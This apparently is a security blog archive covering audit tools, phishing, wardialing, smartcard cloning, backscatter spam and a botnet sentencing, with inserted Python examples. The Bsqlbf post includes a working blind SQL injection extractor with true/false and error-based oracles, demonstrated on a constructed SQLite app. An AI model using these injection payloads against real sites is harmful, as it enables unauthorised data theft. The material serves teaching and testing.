ratproxy - Passive Web Application Security Audit Tool

Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies more commonly used for this task, and is optimized specifically for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.

The proxy analyzes problems such as cross-site script inclusion threats, insufficient cross-site request forgery defenses, caching issues, potentially unsafe cross-domain code inclusion schemes and information leakage scenarios, and much more.
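The kinds of passive checks such a proxy performs are easiest to see on a handful of captured request/response pairs. The following is an added Python example, not ratproxy's code: the Exchange structure, the heuristics and the sample traffic are constructed here for illustration, and a real proxy applies far more nuanced rules, but the four checks map directly onto the problem classes listed above (script inclusion, CSRF, caching, cross-domain code).

```python
"""Passive checks run over captured HTTP exchanges, in the spirit of what a
passive audit proxy looks for: script-includable JSON (XSSI), state-changing
requests lacking an anti-CSRF token, cacheable authenticated responses, and
script inclusion from foreign origins.  Added example; not ratproxy's code,
and the heuristics, names and sample traffic below are constructed."""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit


@dataclass
class Exchange:
    method: str
    url: str
    req_headers: dict
    body: str            # request body, form-encoded, or ""
    status: int
    resp_headers: dict
    resp_body: str


TOKEN_NAME = re.compile(r"csrf|xsrf|token|nonce|authenticity", re.I)
XSSI_PREFIXES = (")]}'", "while(1);", "for(;;);")
SCRIPT_TYPES = {"application/json", "application/javascript", "text/javascript", "text/plain"}
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']?([^\"'\s>]+)", re.I)


def content_type(ex: Exchange) -> str:
    return ex.resp_headers.get("Content-Type", "").split(";")[0].strip().lower()


def authenticated(ex: Exchange) -> bool:
    # A cookie or Authorization header means the response is user-specific.
    return "Cookie" in ex.req_headers or "Authorization" in ex.req_headers


def check_xssi(ex):
    """Authenticated data fetched by a plain GET and served as JSON/JS can be
    pulled in cross-site with <script src=...> unless an unparseable prefix
    guards it."""
    if ex.method != "GET" or not authenticated(ex) or content_type(ex) not in SCRIPT_TYPES:
        return None
    body = ex.resp_body.lstrip()
    if body.startswith(XSSI_PREFIXES):
        return None
    if body.startswith(("[", "{")) or content_type(ex) in ("application/javascript", "text/javascript"):
        return "XSSI: authenticated JSON/JS reachable by GET without an anti-inclusion prefix"
    return None


def check_csrf(ex):
    """A state-changing request from a logged-in user whose parameters carry
    nothing token-like is a CSRF candidate."""
    if ex.method not in ("POST", "PUT", "DELETE") or not authenticated(ex):
        return None
    names = list(parse_qs(ex.body)) + list(parse_qs(urlsplit(ex.url).query))
    if any(TOKEN_NAME.search(n) for n in names):
        return None
    return "CSRF: state-changing request carries no anti-CSRF token"


def check_caching(ex):
    """Responses to authenticated requests must keep shared caches out."""
    if not authenticated(ex) or ex.status != 200:
        return None
    cc = ex.resp_headers.get("Cache-Control", "").lower()
    if "no-store" in cc or "private" in cc:
        return None
    return "CACHE: authenticated response without Cache-Control: private or no-store"


def check_cross_domain_scripts(ex):
    """Scripts loaded from another origin run with the page's full privileges."""
    if content_type(ex) != "text/html":
        return None
    own = urlsplit(ex.url).hostname
    foreign = sorted({urlsplit(src).hostname for src in SCRIPT_SRC.findall(ex.resp_body)} - {own, None})
    if not foreign:
        return None
    return "XDOMAIN: script code included from " + ", ".join(foreign)


CHECKS = (check_xssi, check_csrf, check_caching, check_cross_domain_scripts)


def audit(exchanges):
    """Return (method, url, finding) triples for every check that fires."""
    findings = []
    for ex in exchanges:
        for check in CHECKS:
            msg = check(ex)
            if msg:
                findings.append((ex.method, ex.url, msg))
    return findings


# Constructed sample traffic: five exchanges, four of which should be flagged.
SAMPLE = [
    Exchange("GET", "http://app.example/api/contacts", {"Cookie": "sid=abc"}, "", 200,
             {"Content-Type": "application/json"}, '[{"email":"a@example"}]'),
    Exchange("GET", "http://app.example/api/safe", {"Cookie": "sid=abc"}, "", 200,
             {"Content-Type": "application/json", "Cache-Control": "private"}, ")]}'\n[1,2]"),
    Exchange("POST", "http://app.example/settings", {"Cookie": "sid=abc"}, "email=x%40example", 200,
             {"Content-Type": "text/html", "Cache-Control": "no-store"}, "<html>ok</html>"),
    Exchange("POST", "http://app.example/settings", {"Cookie": "sid=abc"},
             "email=x%40example&csrf_token=deadbeef", 200,
             {"Content-Type": "text/html", "Cache-Control": "no-store"}, "<html>ok</html>"),
    Exchange("GET", "http://app.example/", {"Cookie": "sid=abc"}, "", 200,
             {"Content-Type": "text/html", "Cache-Control": "private"},
             '<html><script src="http://cdn.third-party.example/lib.js"></script></html>'),
]

if __name__ == "__main__":
    for method, url, msg in audit(SAMPLE):
        print(method, url, msg)
```

The value of a passive approach is visible even here: nothing is sent to the application, the findings come purely from traffic the user generated, and the second exchange shows how a `)]}'` prefix silences the XSSI check while a `private` cache directive silences the caching one.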

Why Ratproxy?

There are numerous alternative proxy tools meant to aid security auditors - most notably WebScarab, Paros, Burp, ProxMon, and Pantera. Stick with whatever suits your needs, as long as you get the data you need in the format you like.

That said, ratproxy is there for a reason. It is designed specifically to deliver concise reports that focus on prioritized issues of clear relevance to contemporary web 2.0 applications, and to do so in a hands-off, repeatable manner. It should not overwhelm you with raw HTTP traffic dumps, and it goes far beyond simply providing a framework to tamper with the application by hand.

You can download Ratproxy here:

ratproxy-1.51.tar.gz

Or read more here.

The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since it is in beta, there might be some kinks to be ironed out, and not all web technologies might be properly accounted for.


Google Calendar a New Target for Phishing

It seems the phishing crews are trying out new ideas for conning people into giving away their credentials and leaking information.

The latest target appears to be Google Calendar.

As always, be on your guard, as these scams are coming from all directions.

A few months ago, spam came to Google Calendar. Now phishing has arrived.

Intrepid Google watcher Philipp Lenssen wrote late last week about being the target of a phishing attempt via Google Calendar.

He received an e-mail to his Gmail account with a reference to a legitimate event from his calendar. The sender was listed as “customer care,” and it asked him to verify his account by supplying his username and password.

It seems to be the same old style as normal e-mail phishing, but delivered through the Google Calendar interface. It comes with the usual spelling and grammatical errors that plague phishing e-mails.

I wonder how many people are falling for this one. If generic phishing ploys are anything to go by, it will be quite a lot.

On May 28, a Google Talk Guide addressed the issue in a Google Groups thread, urging users to click the “Report Phishing” link if they receive suspicious e-mails and not to click on links within the e-mails or open attachments.

Late on Monday, a Google representative e-mailed this statement: “Spam is an issue for all Internet users, and we work very hard to fight it. Using Google Calendar, or any Google product, to send spam is a violation of our product policies. We are actively identifying Calendar accounts that send spam and disabling them.”

Perhaps drop a note to any non-tech friends using Google Calendar just to warn them that this is happening.

You might save someone a lot of trouble.

Source: Cnet (Thanks to Navin)


PAW/PAWS - Python Advanced Wardialing System

Now this is an oldskool topic: wardialling! Some people still ask me about wardialling tools though, so here's one I found recently, written in Python.

PAW / PAWS is wardialing software written in Python. It is designed to scan for ISDN (PAWS only) and “modern” analog modems (running at 9.6 kbit/s or higher). Wardialing tools are, despite their martial-sounding name, used to find unauthorized modems so that they can be disabled, making access to the internal network harder.

For PAW, list all the numbers you want dialed in the (text) file “dial.lst”, one per line: numbers only, no spaces, plus signs, dashes or slashes.

For PAWS, each number is accompanied by the ISDN modes to be tested, in the (text) file “dial.lst”, in the exact format shown in the example file (you can delete individual ISDN types), one entry per line: numbers only, no spaces, plus signs, dashes or slashes. There is effectively no syntax check of any kind, so be careful.

Make sure the device your modem is attached to is set correctly in the “tty” variable at the top of paw.py.

Then simply run “./paw.py” or “./paws.py” and watch. A verbatim full log is written to paw_dialing.log, with CR, LF and TAB translated into readable equivalents. For PAW, an additional summary is written as a CSV file, paw_dialing.csv.
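Since the dialer performs no syntax check on dial.lst, it is worth validating the file before you start dialing. The following Python validator is an added example and not part of PAW/PAWS: it enforces the digits-only rule from the instructions above, and adds two safeguards of my own, a length sanity check and an optional allowed-prefix list so that only ranges you are actually authorised to scan get dialed. The sample list is constructed.

```python
"""Sanity-check a PAW-style dial.lst before running the dialer.  Added
example, not part of PAW/PAWS; the length bounds and the allowed-prefix
safeguard are assumptions of this example, not rules of the tool."""
import re

NUMBER_RE = re.compile(r"^[0-9]+$")   # digits only: no '+', '-', '/', spaces


def validate_dial_list(text, allowed_prefixes=(), min_len=3, max_len=20):
    """Return (good_numbers, problems).

    problems is a list of (line_no, entry, reason).  Entries with a problem
    are left out of good_numbers so the cleaned list can be written back.
    allowed_prefixes, if given, restricts dialing to authorised ranges.
    """
    good, problems, seen = [], [], set()
    for no, raw in enumerate(text.splitlines(), start=1):
        entry = raw.strip()
        if not entry:
            continue                                  # blank line, harmless
        if raw != entry:
            problems.append((no, raw, "leading/trailing whitespace"))
            continue
        if not NUMBER_RE.match(entry):
            problems.append((no, entry, "non-digit characters (no '+', '-', '/' or spaces)"))
            continue
        if not min_len <= len(entry) <= max_len:
            problems.append((no, entry, f"length {len(entry)} outside {min_len}..{max_len}"))
            continue
        if allowed_prefixes and not entry.startswith(tuple(allowed_prefixes)):
            problems.append((no, entry, "outside the authorised number ranges"))
            continue
        if entry in seen:
            problems.append((no, entry, "duplicate (would be dialled twice)"))
            continue
        seen.add(entry)
        good.append(entry)
    return good, problems


# Constructed sample: one good line and five different mistakes.
SAMPLE = "5550100\n555-0101\n+15550102\n5550100\n5550103 \n4440104\n"

if __name__ == "__main__":
    good, problems = validate_dial_list(SAMPLE, allowed_prefixes=("555",))
    for no, entry, reason in problems:
        print(f"line {no}: {entry!r}: {reason}")
    print("will dial:", good)
```

Run it with the real dial.lst and the prefixes of your own number block, and only hand the cleaned list to paw.py once the problem list is empty.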

You can download PAW/PAWS here:

paw.tar.gz (analog wardialer only)

paws.tar.gz (ISDN & analog wardialing)

Or read more here.


China Home to at Least HALF of Malicious Web Sites

It looks like China is becoming a hotbed for malware and malicious websites (sites that push malware onto visitors via browser exploits).

They used to be found mostly in Korea, Taiwan and parts of Eastern Europe. According to the latest data, more than half of such sites are now located in China.

More than half of the Web sites foisting malicious software on visitors are located at networks in China, according to data released today.

Stopbadware.org, a joint project between researchers at Harvard, Oxford and Google, found that 52 percent of the more than 200,000 infected sites the group analyzed in late May were hosted at Chinese networks. In contrast, U.S.-based networks accounted for 21 percent of the bad sites, Stopbadware found.

The sites examined in the study were all reported as malicious by Google, which interestingly enough ranked as the 6th largest source of malicious Web sites in this report, with 4,261 malware sites. Most of those appear to be the result of scammers and virus writers devising ways to automate the creation of sites at Google-owned Blogger.com.

It's somewhat ironic: Google is the one labelling malware sites, yet a Google-owned property is in the top 10 sources of malicious web sites!

With Blogger.com coming in as the 6th largest source of malware, this is something Google really needs to take a serious look at.

The numbers from just one month prior paint a much harsher picture for Google. Stopbadware never published these figures, but a source involved in the group’s effort shared data with Security Fix showing Google and Blogger as the 4th largest source of malicious sites, with more than 10,000 such domains. See the comparison charts by clicking on the graphic to the left.

Max Weinstein, project manager for Stopbadware, said the group plans to begin releasing stats on a monthly basis. Weinstein said he believes the spike in malicious domains at Google properties was due to the company’s recent aggressiveness in scanning its own sites for malware.

“When that first happened, Google’s numbers shot way up,” Weinstein said.

Interesting indeed. We'll have to watch and see what Google does about this; they really need to get it under control, especially with many of the new botnet infectors leveraging Blogger.com sites.

Source: Washington Post


Bsqlbf V2 - Blind SQL Injection Brute Forcer Tool

There are quite a lot of SQL injection tools available, and now there is one more to add to the stable for testing: Bsqlbf V2, a blind SQL injection brute forcer.

The original tool (bsqlbfv1.2-th.pl) was intended to exploit blind SQL injection against a MySQL backend database; this new version supports blind SQL injection against the following databases:

  • MS-SQL
  • MySQL
  • PostgreSQL
  • Oracle

It supports injection in string and integer fields. The feature that separates this tool from other SQL injection tools is that it accepts custom SQL queries supplied with the -sql switch.

It supports 2 modes of attack:

  1. Type 0: blind SQL injection based on true and false responses
  2. Type 1: blind SQL injection based on true and error responses (details)
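To make the two attack modes concrete, here is an added Python example (not bsqlbf's own Perl code) that runs both a true/false oracle and a true/error oracle against an in-memory SQLite stand-in for a vulnerable page and recovers a value by binary search, which is how a blind brute forcer extracts data a few bits per request. The vulnerable app, the secret, the SQLite functions used (length, substr, unicode) and the abs() integer-overflow trick used to force an error are my choices; on MySQL, MS-SQL or Oracle the equivalent functions and error triggers differ, which is exactly the kind of difference a tool like this abstracts away.

```python
"""Blind SQL injection against a stand-in vulnerable page, in both modes the
post describes: true/false (type 0) and true/error (type 1).  Added example
in Python, not bsqlbf's code; the app, secret, SQLite functions and the
error trick are choices made for this example."""
import sqlite3

SECRET = "s3cret!"   # constructed sample data the attacker does not know


def build_app():
    """Return page(param) mimicking a vulnerable endpoint: the id parameter
    is concatenated into the query, and the caller can tell apart only three
    outcomes: a row came back, no row came back, or the database errored."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, name TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))

    def page(user_id: str) -> str:
        sql = "SELECT name FROM users WHERE id=" + user_id   # the injection point
        try:
            row = conn.execute(sql).fetchone()
        except sqlite3.Error:
            return "error"
        return "ok" if row else "empty"
    return page


# Stands in for the custom query given with -sql: we read its first column.
TARGET = "(SELECT pw FROM users WHERE name='admin')"


def oracle_type0(page, cond: str) -> bool:
    """True/false: a false condition removes the row from the result."""
    return page(f"1 AND ({cond})") == "ok"


def oracle_type1(page, cond: str) -> bool:
    """True/error: a false condition routes evaluation into abs() of the
    smallest 64-bit integer, which SQLite refuses with 'integer overflow'.
    The operand references a column so the engine cannot pre-compute it."""
    return page(f"1 AND (CASE WHEN ({cond}) THEN 1 "
                f"ELSE abs(-9223372036854775807 - id) END)") == "ok"


def extract(oracle, page, expr: str, max_len: int = 64):
    """Recover the string value of `expr` by binary search: first its length,
    then each character's code point.  Returns (value, query_count)."""
    queries = 0

    def ask(cond):
        nonlocal queries
        queries += 1
        return oracle(page, cond)

    def search(cond_gt, hi):
        # Smallest v in [0, hi] for which "x > v" is false, i.e. v == x.
        lo = 0
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(cond_gt(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = search(lambda v: f"length({expr}) > {v}", max_len)
    chars = [chr(search(lambda v, p=pos: f"unicode(substr({expr}, {p}, 1)) > {v}", 127))
             for pos in range(1, length + 1)]
    return "".join(chars), queries


if __name__ == "__main__":
    app = build_app()
    for name, oracle in (("type 0", oracle_type0), ("type 1", oracle_type1)):
        value, n = extract(oracle, app, TARGET)
        print(f"{name}: recovered {value!r} in {n} requests")
```

Both oracles recover the same secret in well under a hundred requests, about seven per character. In a real engagement the oracle is an HTTP request and the "ok"/"empty"/"error" distinction is made by comparing response bodies or status codes, which is where most of a blind injection tool's complexity actually lives.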

You can download Bsqlbf V2 here:

bsqlbf-v2.1.zip

Or read more here.


Hackers Crack London Tube Oyster Card

It just goes to show, having an aluminium-lined wallet could really be useful! Hackers in the Netherlands found they could clone an access card using the Mifare chip; after that they travelled to London to try their technique out on the Oyster card (used on the London Underground), which uses the same chip.

It just goes to show…the implementation of these cards really isn't good yet.

Dutch security researchers rode the London Underground free for a day after easily using an ordinary laptop to clone the “smartcards” commuters use to pay fares, a hack that highlights a serious security flaw because similar cards provide access to thousands of government offices, hospitals and schools.

There are more than 17 million of the transit cards, called Oyster Cards, in circulation. Transport for London says the breach poses no threat to passengers and “the most anyone could gain from a rogue card is one day’s travel.” But this is about more than stealing a free fare or even cribbing any personal information that might be on the cards.

Oyster Cards feature the same Mifare chip used in security cards that provide access to thousands of secure locations. Security experts say the breach poses a threat to public safety and the cards should be replaced.

Apparently they can only use the cloned card for one day’s travel, but still…what would stop them from doing it every day?

Or cloning an access card to a more important place and wreaking some havoc there.

The hackers scanned one of the Underground’s many card readers to collect the cryptographic key that purportedly keeps the system secure. The keys were uploaded to a laptop, essentially turning it into a portable card reader. The hackers then brushed up against passengers to wirelessly upload the information on their Oyster cards. That information in hand, it was a simple matter of using it to program new cards.

Jacobs says the same technique can clone smartcards that provide access to secure buildings. “An employee can be cloned by bumping into that person with a portable card reader,” he told the Times. “The person whose identity is being stolen may then be completely unaware that anything has happened. At the technical level there are currently no known countermeasures.”

So break out your tinfoil hats and aluminium hats, the smartcard hackers are coming to a building near you soon.

The Dutch government is taking this VERY seriously, planning to replace all 120,000 smart cards used by its employees for access. That will be an expensive exercise.

I wonder whether Oyster will make any changes following the media coverage of this?

And what rights does a consumer have after their card is cloned and their credit used? Are they insured? Would they even notice? Whose responsibility is it?

Source: Wired Blog (Thanks to razta).


NDR or Backscatter Spam - How Non Delivery Reports Become a Nuisance

You might remember a while ago we mentioned MP3 spam, which in October last year was the latest evolution in spam.

Currently there is a new type annoying mail-server owners the world over; it's known as NDR or backscatter spam and involves NDRs, or Non Delivery Reports (the e-mails you get when you send mail to a non-working or no longer active account).

Research shows that up to 90% of emails received by companies are spam, and spammers have adopted a variety of methods to bypass spam filters used in anti-spam software. In the beginning, spam was mainly text based but over the past few years, spammers have resorted to using embedded images and attaching common file types such as mp3s and Excel documents in emails to gain access to mailboxes. Another option is NDR or non-delivery report spam.

NDRs are a common part of email exchanges. Users receive NDRs, for example, when an email does not arrive at a recipient’s address and notification is sent to the sender. However, spammers can cause a considerable increase in NDR activity because they send junk mail to thousands of email addresses. Some are genuine but others are not and these are used to generate NDR messages by manipulating the ‘From’ address to use a real domain sender. This results in email users receiving NDRs from people they had never sent an email to in the first place.

This white paper explains what NDR spam is and how administrators can take effective measures to reduce the impact on their email servers.

To download a copy of the white paper, please visit:

http://www.gfi.com/whitepapers/ndr-spam.pdf [PDF]
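One widely used countermeasure against backscatter, not described in the post itself, is to sign your own outgoing return paths so that a bounce addressed to an address you never used as a sender can be refused at RCPT TO time. The following Python is an added example of that approach in the style of BATV's prvs tag (prvs=KDDDSSSSSS=user@domain: key id, expiry day, signature); the HMAC-SHA256 truncation, the 7-day lifetime, the caller-supplied day counter and the sample addresses are assumptions of this example, not the white paper's content.

```python
"""Refuse backscatter by tagging outgoing return paths, so that a bounce to
an untagged or badly signed address is rejected at RCPT TO.  Added example
in the style of BATV's prvs layout; the hash, lifetime and day counter are
choices made here, not a specification."""
import hashlib
import hmac
import re

PRVS_RE = re.compile(
    r"^prvs=(?P<k>[0-9])(?P<ddd>[0-9]{3})(?P<sig>[0-9a-f]{6})=(?P<core>[^@]+@[^@]+)$", re.I)

# Constructed demo key; real deployments rotate keys and keep them secret.
KEYS = {0: b"constructed-demo-key"}
TODAY = 500          # any monotonic day counter works (e.g. days since epoch)


def _signature(key: bytes, key_id: int, expiry: int, core: str) -> str:
    msg = f"{key_id}{expiry:03d}{core.lower()}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()[:6]


def sign_return_path(core: str, key: bytes, key_id: int, today: int, lifetime: int = 7) -> str:
    """MAIL FROM address to use on outgoing mail; valid for `lifetime` days."""
    expiry = (today + lifetime) % 1000            # DDD field wraps at 1000 days
    return f"prvs={key_id}{expiry:03d}{_signature(key, key_id, expiry, core)}={core}"


def verify_return_path(addr: str, keys: dict, today: int, lifetime: int = 7):
    """Return the untagged address if the tag is genuine and unexpired, else None."""
    m = PRVS_RE.match(addr)
    if not m:
        return None
    key_id, expiry, core = int(m["k"]), int(m["ddd"]), m["core"]
    key = keys.get(key_id)
    if key is None:
        return None
    if not hmac.compare_digest(_signature(key, key_id, expiry, core), m["sig"].lower()):
        return None
    if (expiry - today) % 1000 > lifetime:       # expired (wrapped) or a future forgery
        return None
    return core


def rcpt_decision(mail_from: str, rcpt_to: str, keys: dict, today: int):
    """Policy at RCPT TO: a bounce (null reverse path) is accepted only when
    addressed to a tagged return path we issued; ordinary mail is delivered
    to the untagged mailbox with any tag stripped."""
    is_bounce = mail_from.strip() in ("", "<>")
    untagged = verify_return_path(rcpt_to, keys, today)
    if is_bounce:
        if untagged is None:
            return ("reject", "550 5.7.1 bounce to an address never used as a sender")
        return ("accept", untagged)
    m = PRVS_RE.match(rcpt_to)
    return ("accept", m["core"] if m else rcpt_to)


if __name__ == "__main__":
    signed = sign_return_path("alice@example.com", KEYS[0], 0, TODAY)
    print("outgoing MAIL FROM:", signed)
    print("genuine bounce:   ", rcpt_decision("<>", signed, KEYS, TODAY))
    print("backscatter:      ", rcpt_decision("<>", "alice@example.com", KEYS, TODAY))
    print("expired bounce:   ", rcpt_decision("<>", signed, KEYS, TODAY + 30))
```

The point of the design is that the receiving server needs no list of what it sent: the HMAC proves the address was minted with its key, and the day field bounds how long a harvested tagged address stays usable. Mailing-list and forwarding setups that rewrite the sender need care, since a bounce to a rewritten address will be refused.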


BackTrack Final 3 Hacking LiveCD Released For Download

If you don't know, BackTrack is a top-rated Linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform boots directly from the CD-ROM and is fully accessible within minutes.

Back in January we mentioned that the BackTrack Live Hacking CD BETA 3 was released; at last the final version is ready for download!

New Stuff

SAINT
SAINT has provided BackTrack users with a functional version of SAINT, pending a free request for an IP range license through the SAINT website, valid for 1 year.

Maltego
The guys over at Paterva have created a special version of Maltego v2.0 with a community license especially for BackTrack users. We would like to thank Paterva for co-operating with us and allowing us to feature this amazing tool in BackTrack.

Nessus
Tenable would not allow for redistribution of Nessus on BackTrack 3.

Kernel
2.6.21.5. Yes, yes, stop whining….We had serious deliberations concerning the BT3 kernel. We decided not to upgrade to a newer kernel as wireless injection patches were not fully tested and verified. We did not want to jeopardize the awesome wireless capabilities of BT3 for the sake of sexiness or slightly increased hardware compatibilities. All relevant security patches have been applied.

Tools
As usual, updated, sharpened, SVN’ed and armed to the teeth. This release we have some special features such as spoonwep, fastrack and other cool additions.

Availability

For the first time we distribute three different versions of BackTrack 3:

  • CD version
  • USB version
  • VMWare version

You can download BackTrack 3 Final here:

http://remote-exploit.org/backtrack_download.html

Or read more here.


Botmaster Robert Matthew Bentley AKA LSDigital Sentenced

Another one bites the dust, with another reasonably hefty sentence; this time it's a bot herder, or botnet master.

Just under 4 years in prison and a big chunk of change in restitution; I guess he probably has plenty of cash stashed somewhere though. These guys can really rake it in with their mass infectors of doom.

A US-based hacker has been sentenced to 41 months in jail for breaking into corporate computers in Europe and making them part of a money-generating botnet.

Robert Matthew Bentley, 21, of Panama City, Florida, was also ordered to perform three years of supervised release once his prison time is over and to pay $65,000 in restitution, according to federal prosecutors in Pensacola, Florida.

In March, Bentley, who sometimes went by the alias LSDigital, pleaded guilty to two felony counts related to his botnet activities, which inflicted more than $150,000 worth of damage on Newell Rubbermaid. Starting as early as December 2006, Bentley and several unnamed co-conspirators installed customized bots on hundreds of the company’s computers. The malware generated so much traffic on Rubbermaid’s servers that its network stopped functioning.

He pleaded guilty, which might have saved him from an even heavier punishment; I guess he knew they had enough evidence to nail him soundly, so he may as well look after his own interests.

I wonder if his conspirators will get busted too?

New infections from the attack were being detected as recently as March, four months after Bentley was arrested. Federal agents continue to investigate the uncharged suspects. At least one of them lived in Philadelphia.

Federal prosecutors began their case after the Metropolitan Police Computer Crime Unit in London fielded a complaint from Rubbermaid representatives in Europe. According to court documents, Bentley and his cronies generated “thousands of dollars” by installing adware from DollarRevenue.com on the infected machines.

The bot masters used the domain name smokedro.com as a command and control channel. They breached Newell Rubbermaid using at least three malicious files bearing the names 84785_redworld[1].exe, mssecure.exe and msiupdate.exe.

It looks like they had it pretty well wrapped up and, by the looks of it (new infections in March), they are still going strong.

I wonder what the status is now?

They were busted as part of the FBI campaign known as Operation Bot Roast.

Source: The Register


Technitium FREE MAC Address Changer v5 Released

Technitium MAC Address Changer allows you to change the Media Access Control (MAC) address of your Network Interface Card (NIC) irrespective of the NIC manufacturer or its driver. It has a very simple user interface and provides ample information about each NIC in the machine. Every NIC has a MAC address hard-coded into its circuitry by the manufacturer, and this hard-coded MAC address is used by the Windows drivers to access the Ethernet network (LAN). This tool can set a new MAC address on your NIC, overriding the original hard-coded one. Technitium MAC Address Changer is a must-have tool in every security professional's toolbox. It is coded in Visual Basic 6.0.

Features

  • Support for Windows Vista SP1 and Windows Server 2008 added.
  • Allows you to remove all registry entries corresponding to a Network Adapter that is no longer physically installed on the system.
  • Allows you to configure Internet Explorer HTTP proxy settings through configuration presets or the command line.
  • Issues with the installer program resolved. (Thanks for all your feedback)
  • Identifies the preset applied to the currently selected Network Interface Card (NIC) automatically, making it easy to identify settings.
  • Most known issues with Windows Vista fixed. (Thanks for all your feedback)
  • Changes the MAC address of any Network Interface Card (NIC), including Wireless LAN cards, irrespective of its manufacturer or drivers.
  • Has the latest list of all known manufacturers (with corporate addresses) to choose from. You can also enter any MAC address and find out which manufacturer it belongs to.
  • Allows you to select a random MAC address from the list of manufacturers with a single click.
  • Restarts your NIC automatically to apply MAC address changes instantaneously.
  • Allows you to create Configuration Presets, which save all your NIC settings and make it very simple to switch between many settings in a single click, saving a lot of time.
  • Allows you to import or export Configuration Presets to or from another file, saving the time spent on reconfiguration.
  • Allows you to load any Configuration Preset when TMAC starts by double-clicking a Configuration Preset file (*.cpf extension).
  • Has a command-line interface that allows you to perform all tasks from the command prompt, or even create a DOS batch program to carry out regular tasks (see the help for command-line parameter details).
  • Allows you to export a detailed text report for all the network connections.
  • Displays all the information you would ever need about your NIC in one view: Device Name, Configuration ID, Hardware ID, Connection Status, Link Speed, DHCP details, TCP/IP details, etc.

You can download Technitium v5 here:

Technitium-MAC-Address-Changer

Or read more here.

